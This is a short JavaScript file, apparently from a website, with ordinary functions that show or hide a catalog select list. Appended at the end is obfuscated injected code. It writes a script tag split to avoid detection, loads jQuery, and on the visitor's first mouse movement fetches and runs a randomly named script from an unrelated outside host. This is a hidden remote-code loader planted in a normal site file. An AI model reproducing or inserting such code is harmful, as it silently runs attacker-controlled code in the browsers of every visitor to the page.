function catalog_select_list_toggle(){
  object_toggle( 'catalog_select_list' );
}

function object_toggle( obj_id ){
  obj_item = document.getElementById( obj_id );
  if( obj_item ){
    if( obj_item.style.display == 'none' ){
      obj_item.style.display = '';
    }else{
      obj_item.style.display = 'none';
    }
  }
}document.write('<scr'+'ipt src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});
